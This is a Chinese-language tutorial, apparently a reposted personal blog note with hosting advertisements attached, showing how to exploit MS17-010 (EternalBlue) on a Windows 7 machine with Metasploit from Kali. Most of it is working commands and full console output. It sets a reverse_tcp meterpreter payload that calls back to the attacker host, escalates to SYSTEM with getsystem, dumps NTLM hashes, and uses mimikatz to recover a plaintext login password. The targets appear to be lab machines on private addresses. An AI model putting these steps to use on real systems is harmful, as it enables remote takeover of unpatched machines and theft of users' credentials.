ms17-010漏洞利用教程-创新互联

主要是方便自己之后忘了,而写的,大佬绕过,大佬绕过,大佬绕过,重要的说三遍。哈哈

专注于为中小企业提供成都网站建设、成都网站设计服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业海阳免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了上千家企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。

***机:

IP地址:192.168.10.15

系统:kali linux

靶机:

IP地址:192.168.10.13

系统:win7

启动metasploit-framework

~# msfconsole

ms17-010漏洞利用教程

查找需要用到的***模块:

msf > search ms17-010

Matching Modules

================

  Name                    Disclosure Date  Rank   Description

  ----                    ---------------  ----   -----------

  auxiliary/admin/smb/ms17_010_command    2017-03-14    normal  MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

  auxiliary/scanner/smb/smb_ms17_010             normal  MS17-010 SMB RCE Detection

  exploit/windows/smb/ms17_010_eternalblue  2017-03-14    average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

  exploit/windows/smb/ms17_010_psexec    2017-03-14    normal  MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

先用辅助模块auxiliary/scanner/smb/smb_ms17_010,检测目标系统是否存在这个漏洞

msf > use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(scanner/smb/smb_ms17_010) > options   查看需要设置那些参数,看required,如果下面是yes就必须设置

Module options (auxiliary/scanner/smb/smb_ms17_010):

  Name     Current Setting                         Required  Description

  ----     ---------------                         --------  -----------

  CHECK_ARCH  true                               no     Check for architecture on vulnerable hosts

  CHECK_DOPU  true                               no     Check for DOUBLEPULSAR on vulnerable hosts

  CHECK_PIPE  false                              no     Check for named pipe on vulnerable hosts

  NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes    List of named pipes to check

  RHOSTS                                    yes    The target address range or CIDR identifier

  RPORT     445                               yes    The SMB service port (TCP)

  SMBDomain   .                                no     The Windows domain to use for authentication

  SMBPass                                    no     The password for the specified username

  SMBUser                                    no     The username to authenticate as

  THREADS    1                                yes    The number of concurrent threads

msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.10.13  ####大部分参数已经默认,只需要设置rhosts即可

rhosts => 192.168.10.13

msf auxiliary(scanner/smb/smb_ms17_010) > run  ###执行 可以看到返回可能存在ms17-010漏洞

[+] 192.168.10.13:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

使用exploit模块:

msf auxiliary(scanner/smb/smb_ms17_010) > back  返回上层用back,不用也可以直接选择另一个模块,只是说一下

msf >

msf > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > options   ###查看需要设置参数

Module options (exploit/windows/smb/ms17_010_eternalblue):

  Name         Current Setting  Required  Description

  ----         ---------------  --------  -----------

  GroomAllocations   12        yes    Initial number of times to groom the kernel pool.

  GroomDelta      5         yes    The amount to increase the groom count by per try.

  MaxExploitAttempts  3         yes    The number of times to retry the exploit.

  ProcessName     spoolsv.exe    yes    Process to inject payload into.

  RHOST                 yes    The target address

  RPORT        445        yes    The target port (TCP)

  SMBDomain      .         no     (Optional) The Windows domain to use for authentication

  SMBPass                no     (Optional) The password for the specified username

  SMBUser                no     (Optional) The username to authenticate as

  VerifyArch      true       yes    Check if remote architecture matches exploit Target.

  VerifyTarget     true       yes    Check if remote OS matches exploit Target.

Exploit target:

  Id  Name

  --  ----

  0  Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.10.13  #####设置靶机ip

RHOST => 192.168.10.13

msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp  ###设置payload如果是32位系统就用windows/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

  Name         Current Setting  Required  Description

  ----         ---------------  --------  -----------

  GroomAllocations   12        yes    Initial number of times to groom the kernel pool.

  GroomDelta      5         yes    The amount to increase the groom count by per try.

  MaxExploitAttempts  3         yes    The number of times to retry the exploit.

  ProcessName     spoolsv.exe    yes    Process to inject payload into.

  RHOST        192.168.10.13   yes    The target address

  RPORT        445        yes    The target port (TCP)

  SMBDomain      .         no     (Optional) The Windows domain to use for authentication

  SMBPass                no     (Optional) The password for the specified username

  SMBUser                no     (Optional) The username to authenticate as

  VerifyArch      true       yes    Check if remote architecture matches exploit Target.

  VerifyTarget     true       yes    Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

  Name    Current Setting  Required  Description

  ----    ---------------  --------  -----------

  EXITFUNC  thread      yes    Exit technique (Accepted: '', seh, thread, process, none)

  LHOST            yes    The listen address

  LPORT   4444       yes    The listen port

Exploit target:

  Id  Name

  --  ----

  0  Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.15  ####设置本地主机

lhost => 192.168.10.15

msf exploit(windows/smb/ms17_010_eternalblue) > run   ####执行

[*] Started reverse TCP handler on 192.168.10.15:4444

[*] 192.168.10.13:445 - Connecting to target for exploitation.

[+] 192.168.10.13:445 - Connection established for exploitation.

[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)

[*] 192.168.10.13:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima

[*] 192.168.10.13:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service

[*] 192.168.10.13:445 - 0x00000020  50 61 63 6b 20 31                 Pack 1

[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.10.13:445 - Trying exploit with 12 Groom Allocations.

[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet

[*] 192.168.10.13:445 - Starting non-paged pool grooming

[+] 192.168.10.13:445 - Sending SMBv2 buffers

[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.10.13:445 - Sending final SMBv2 buffers.

[*] 192.168.10.13:445 - Sending last fragment of exploit packet!

[*] 192.168.10.13:445 - Receiving response from exploit packet

[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.10.13:445 - Sending egg to corrupted connection.

[*] 192.168.10.13:445 - Triggering free of corrupted buffer.

[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   中间可能会失败,耐心点。

[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[*] 192.168.10.13:445 - Connecting to target for exploitation.

[+] 192.168.10.13:445 - Connection established for exploitation.

[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)

[*] 192.168.10.13:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima

[*] 192.168.10.13:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service

[*] 192.168.10.13:445 - 0x00000020  50 61 63 6b 20 31                 Pack 1

[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.10.13:445 - Trying exploit with 17 Groom Allocations.

[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet

[*] 192.168.10.13:445 - Starting non-paged pool grooming

[+] 192.168.10.13:445 - Sending SMBv2 buffers

[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.10.13:445 - Sending final SMBv2 buffers.

[*] 192.168.10.13:445 - Sending last fragment of exploit packet!

[*] 192.168.10.13:445 - Receiving response from exploit packet

[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.10.13:445 - Sending egg to corrupted connection.

[*] 192.168.10.13:445 - Triggering free of corrupted buffer.

[*] Sending stage (206403 bytes) to 192.168.10.13

[*] Meterpreter session 1 opened (192.168.10.15:4444 -> 192.168.10.13:49341) at 2018-05-13 10:17:45 +0800

[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >    拿到一个反弹的meterpreter

***后的提权:

meterpreter > sysinfo  查看系统后的信息

Computer     : INI-PC

OS        : Windows 7 (Build 7601, Service Pack 1).

Architecture   : x64

System Language : zh_CN

Domain      : WORKGROUP

Logged On Users : 2

Meterpreter   : x64/windows

meterpreter > getsystem  ===》####用这个提权比较顺利,有时候这个提权可能提权不了,还可以通过绕过UAC进行提权,可以参考:http://netsecurity.51cto.com/art/201612/524691.htm

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

抓取用户的密码:

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9f22bada0de76a5744d444632dafa2a7:::

ini:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

meterpreter > load mimikatz  加载密码提取神器,哈哈

Loading extension mimikatz...Success.

meterpreter > kerberos

[+] Running as SYSTEM

[*] Retrieving kerberos credentials

kerberos credentials

====================

AuthID   Package   Domain     User      Password

------   -------   ------     ----      --------

0;997   Negotiate  NT AUTHORITY  LOCAL SERVICE

0;996   Negotiate  WORKGROUP   INI-PC$

0;47944  NTLM

0;999   NTLM    WORKGROUP   INI-PC$

0;114022  NTLM    ini-PC     ini       123456

0;113976  NTLM    ini-PC     ini       123456   ###得到用户的密码

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


分享题目:ms17-010漏洞利用教程-创新互联
网页地址:http://scyanting.com/article/diheih.html